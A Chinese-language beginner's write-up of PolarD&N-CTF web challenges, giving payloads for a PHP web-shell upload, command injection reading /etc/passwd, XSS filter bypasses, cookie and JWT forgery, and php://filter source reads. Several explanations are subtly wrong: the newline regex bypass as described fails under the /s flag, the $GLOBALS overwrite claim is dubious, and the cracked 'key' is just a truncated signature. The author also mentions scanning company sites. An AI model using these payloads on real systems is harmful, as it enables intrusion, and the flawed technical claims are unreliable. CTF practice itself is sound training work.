PolarD&N-CTF Web入门：从零到一的实战通关笔记

1. 初识CTF Web安全挑战

第一次接触PolarD&N-CTF的Web题目时，我完全是个小白。记得当时连"dirsearch"是什么工具都不知道，更别说正则绕过了。现在回头看这些入门题，发现它们就像精心设计的阶梯，一步步引导新手理解Web安全的核心逻辑。

Web安全入门最迷人的地方在于：每个漏洞都是程序员无意间留下的逻辑漏洞。比如那个经典的.swp备份文件泄露，就是开发者在vim编辑时产生的临时文件。实战中我遇到过不少企业网站都存在这类问题，只需要在URL后添加/.index.php.swp就能获取源码。

2. 基础工具与信息收集

2.1 目录扫描实战

新手必备的第一个神器就是dirsearch。记得我第一次用这个工具扫描时，手抖输错了参数，把目标服务器扫挂了（后来才知道要加-delay参数控制速度）。在PolarD&N-CTF的"swp"题目中，标准操作流程应该是：

bash复制python3 dirsearch.py -u http://target.com -e php,swp,bak

关键点在于：

• -e参数指定扫描扩展名，php/swp/bak是必选项
• 发现.index.php.swp后要用vim -r恢复文件
• 备份文件常包含未部署的敏感代码

2.2 源码审计技巧

拿到源码后的分析是门艺术。以那道正则绕过题为例：

php复制function jiuzhe($xdmtql) {
    return preg_match('/sys.*nb/is',$xdmtql); 
}

这里有两个关键过滤：

1. .*会匹配除换行符外的任意字符
2. 末尾需要包含'sys nb'字符串

我的绕过方案是用换行符分割：

code复制xdmtql=sys%0anb

因为%0a在URL解码后就是换行符，能绕过正则但保留字符串内容。

3. 常见漏洞类型实战

3.1 文件上传漏洞

"ezupload"这道题展示了典型的文件上传漏洞。新手常犯的错误是直接上传.php文件，其实有更隐蔽的方式：

1. 先上传合法图片文件
2. 通过Burp修改Content-Type为image/gif
3. 在文件末尾追加PHP代码

http复制POST /upload.php HTTP/1.1
Content-Type: multipart/form-data

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="test.gif"
Content-Type: image/gif

GIF89a
<?php system($_GET['cmd']); ?>

3.2 RCE绕过技巧

"简单rce"题目演示了命令注入的经典过滤场景。当空格被过滤时，可以用这些替代方案：

实战payload示例：

code复制?cmd=ls${IFS}-la
?cmd=cat%09/etc/passwd

4. 客户端漏洞挖掘

4.1 XSS实战突破

"浮生日记"这道XSS题教会我前端过滤的绕过技巧。当发现<script>被过滤时：

1. 先用">闭合前端的input标签
2. 双写关键字：<scriscriptpt>
3. 最终payload：

html复制"><scriscriptpt>alert(1)</scriscriptpt>

4.2 前端验证绕过

"蜜雪冰城"题目展示了纯前端验证的脆弱性。通过Chrome开发者工具：

1. 按F12打开调试器
2. 找到对应DOM元素
3. 直接修改disabled属性
4. 或者修改元素ID为题目要求的数值

5. 认证与会话漏洞

5.1 Cookie欺骗实战

在"cookie欺骗"题目中，关键是要理解服务端的验证逻辑：

http复制GET /admin.php HTTP/1.1
Cookie: role=admin

通过Burp拦截请求，简单修改Cookie值就能获得权限。实际开发中这种漏洞常出现在JWT未签名或使用弱密钥的情况。

5.2 JWT伪造技巧

"jwt"题目需要用到jwt-cracker工具破解弱密钥：

bash复制./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZ3Vlc3QifQ.SYSA

破解出密钥SYSA后，用jwt.io网站重新生成管理员token：

1. 修改user字段为admin
2. 使用相同密钥签名
3. 替换浏览器中的JWT令牌

6. 特殊技巧与综合应用

6.1 变量覆盖漏洞

"$$"这道题展示了PHP变量覆盖的威力。当看到这种代码结构时：

php复制$c = $_GET['c'];
$$c = 'test';

可以构造payload使$c=GLOBALS，这样就会变成：

php复制$GLOBALS = 'test';

从而泄露所有全局变量，包括flag。

6.2 伪协议利用

PHP伪协议在CTF中屡试不爽。以"签到题"为例：

code复制?file=php://filter/convert.base64-encode/resource=flag

这个payload能：

1. 绕过../过滤
2. 避免直接执行PHP代码
3. 以base64形式获取源码

7. 解题思路与经验分享

刚开始做CTF时，我总想着直接找flag，后来才发现理解出题人意图更重要。比如"召唤神龙"那道题，表面是游戏，实际考察的是JS代码审计能力。

几个实用建议：

1. 养成随手查看网页源码的习惯（Ctrl+U）
2. 遇到输入框先尝试经典payload：'"><script>alert(1)</script>
3. 任何验证都要用Burp拦截看看原始请求
4. 善用开发者工具的Console执行JS代码

记得有次比赛遇到一道题卡了3小时，最后发现flag就在robots.txt里。这种经历让我明白：Web安全需要耐心和系统性的检查清单。